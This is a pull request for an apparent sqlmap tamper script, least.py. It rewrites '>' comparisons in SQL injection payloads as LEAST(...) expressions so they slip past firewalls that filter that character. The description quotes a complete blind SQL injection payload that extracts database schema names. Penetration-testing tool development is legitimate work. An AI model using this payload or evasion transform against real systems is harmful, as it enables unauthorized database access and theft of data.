### PR TITLE
Fix regex for tamper script greatest

### DIFF
--- a/tamper/least.py
+++ b/tamper/least.py
@@ -16,21 +16,19 @@ def dependencies():
 
 def tamper(payload, **kwargs):
     """
-    Replaces greater than operator ('>') with 'GREATEST' counterpart
+    Replaces greater than operator ('>') with 'LEAST' counterpart
 
     Tested against:
-        * MySQL 4, 5.0 and 5.5
-        * Oracle 10g
-        * PostgreSQL 8.3, 8.4, 9.0
+        * MySQL 5.5
 
     Notes:
         * Useful to bypass weak and bespoke web application firewalls that
           filter the greater than character
-        * The GREATEST clause is a widespread SQL command. Hence, this
+        * The LEAST clause is a widespread SQL command. Hence, this
           tamper script should work against majority of databases
 
     >>> tamper('1 AND A > B')
-    '1 AND GREATEST(A,B+1)=A'
+    '1 AND LEAST(A,B+1)=B+1'
     """
 
     retVal = payload
@@ -39,7 +37,7 @@ def tamper(payload, **kwargs):
         match = re.search(r"(?i)((?:\bAND|OR\b)\s*)((?:(?!\bAND|OR\b).)+?)\s*>\s*((?:(?!\bAND|OR\b).)+?)(\s*(?:\bAND|OR\b))", payload)
 
         if match:
-            _ = "%sGREATEST(%s,%s+1)=%s%s" % (match.group(1), match.group(2), match.group(3), match.group(2), match.group(4))
+            _ = "%sLEAST(%s,%s+1)=%s+1%s" % (match.group(1), match.group(2), match.group(3), match.group(3), match.group(4))
             retVal = retVal.replace(match.group(0), _)
 
     return retVal


### PR DESCRIPTION
The original regex in greatest.py didn't work in a blind injection case that filters '>'. Payload sample from sqlmap: admin' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),1,1))>64 AND 'XJnE'='XJnE

Also in the formula "tamper('1 AND A > B')", B in most cases is just a number, so rewrite the request using LEAST like LEAST(A,B+1)=B+1 makes it much shorter and easier to read than GREATEST(A,B+1)=A, hence the new least.py